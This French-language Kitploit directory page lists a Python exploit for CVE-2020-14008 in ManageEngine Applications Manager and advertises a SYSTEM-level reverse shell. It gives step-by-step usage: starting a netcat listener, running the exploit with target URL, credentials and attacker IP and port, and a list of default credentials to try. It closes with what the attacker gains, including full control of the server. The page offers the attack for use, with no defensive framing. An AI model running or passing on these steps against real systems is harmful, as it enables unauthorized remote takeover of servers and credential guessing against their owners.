Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2020-14008 — Exploit Python pour CVE-2020-14008 dans ManageEngine Applications Manager fournissant un shell inversé au niveau SYSTEM via une exécution de code à distance authentifiée. | Kitploit
Outils/GitHubGitHub/jackhars/cve-2020-14008
Escalade de PrivilègesGénération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubjackhars/cve-2020-14008

cve-2020-14008

Exploit Python pour CVE-2020-14008 dans ManageEngine Applications Manager fournissant un shell inversé au niveau SYSTEM via une exécution de code à distance authentifiée.

Voir le dépôt
4il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-14008 Exploitation ManageEngine

Qu'est-ce que c'est ?

Ce script exploite la CVE-2020-14008 dans ManageEngine Applications Manager pour obtenir un reverse shell avec les privilèges SYSTEM.

Prérequis

root@kitploit:~
pip3 install requests urllib3

Comment l'utiliser

1. Lancez un listener

root@kitploit:~
nc -nlvp 9001

2. Exécutez l'exploit

root@kitploit:~
python3 cve-2020-14008-exploit.py <target_url> <username> <password> <your_ip> <your_port>

Exemples

root@kitploit:~
# Direct attack
python3 cve-2020-14008-exploit.py https://192.168.1.100:8443 admin admin 192.168.1.50 9001

# Through port forwarding
python3 cve-2020-14008-exploit.py https://localhost:8443 admin admin 127.0.0.1 9001

Identifiants courants à essayer

  • admin:admin
  • administrator:administrator
  • guest:guest

Ce que vous obtenez

  • Reverse shell PowerShell
  • Privilèges SYSTEM sur la cible
  • Contrôle total du serveur ManageEngine
Télécharger l’outil